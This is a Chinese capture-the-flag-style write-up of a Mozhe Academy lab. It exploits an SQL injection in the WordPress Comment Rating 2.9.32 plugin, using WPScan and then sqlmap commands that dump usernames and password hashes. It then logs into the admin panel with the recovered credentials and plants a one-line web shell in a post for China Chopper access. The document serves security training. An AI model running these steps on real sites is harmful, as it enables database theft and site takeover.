墨者學院-WordPress插件漏洞分析溯源

靶場地址:
https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe

開啟kali虛擬機,使用WPScan掃描漏洞
執行命令 wpscan -u 219.153.49.228:48309掃描漏洞

執行命令掃描插件漏洞wpscan -u 219.153.49.228:48309 --enumerate vp,掃描到插件漏洞,插件Comment Rating 2.9.32存在sql注入漏洞


網上查找漏洞詳情,漏洞所在頁面為:http://ip/wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a

交給sqlmap跑,執行 sqlmap -u "[url]"--dbs

執行sqlmap -u "[url]" -D test --tables

執行sqlmap -u "[url]" -D test -T wp_users --columns

執行sqlmap-u "[url]" -D test -T wp_users -C "user_login,user_pass" --dump --batch


后臺登錄地址:http://219.153.49.228:48309/wp-login.php
這里sqlmap顯示出了點問題登錄賬號密碼是 admin/12qwaszx

登錄后臺
在寫文章處插入一句話代碼,發布成功后查看文章,記錄url,就可以上菜刀連接了


?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容